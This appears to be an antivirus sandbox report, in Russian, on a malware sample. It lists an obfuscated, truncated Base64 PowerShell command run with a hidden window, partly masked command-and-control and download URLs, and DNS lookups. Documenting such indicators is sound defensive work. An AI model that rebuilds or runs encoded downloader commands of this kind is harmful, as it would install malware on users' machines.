Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaAG0AbwBpADcAMQB5AD0AKAAoACcAVwAnACsAJwBuAGIAawA1ACcAKQArACcAYwAnACsAJwBpACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAFIATw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %TEMP%\830377.cvr
- 'di##ain.es':443
- 'co###izate.com':80
- 'co###izate.com':443
- 'me####lucoesti.com':80
- 'me####lucoesti.com':443
- 'gu#####er-kanzlei.de':443
- 'da###buzz.net':80
- 'da###buzz.net':443
- 'pa###icgroup.ws':80
- http://co###izate.com/eng/wF/
- http://me####lucoesti.com/R9KDq0O8w/2thFB1Io/
- http://da###buzz.net/css/hpIJ8q/
- http://pa###icgroup.ws/paradisesuiting.com/3dvqW/
- 'di##ain.es':443
- 'co###izate.com':443
- 'me####lucoesti.com':443
- 'gu#####er-kanzlei.de':443
- 'da###buzz.net':443
- DNS ASK po##coop.kr
- DNS ASK di##ain.es
- DNS ASK co###izate.com
- DNS ASK me####lucoesti.com
- DNS ASK gu#####er-kanzlei.de
- DNS ASK da###buzz.net
- DNS ASK pa###icgroup.ws
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaAG0AbwBpADcAMQB5AD0AKAAoACcAVwAnACsAJwBuAGIAawA1ACcAKQArACcAYwAnACsAJwBpACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAFIATw...' (со скрытым окном)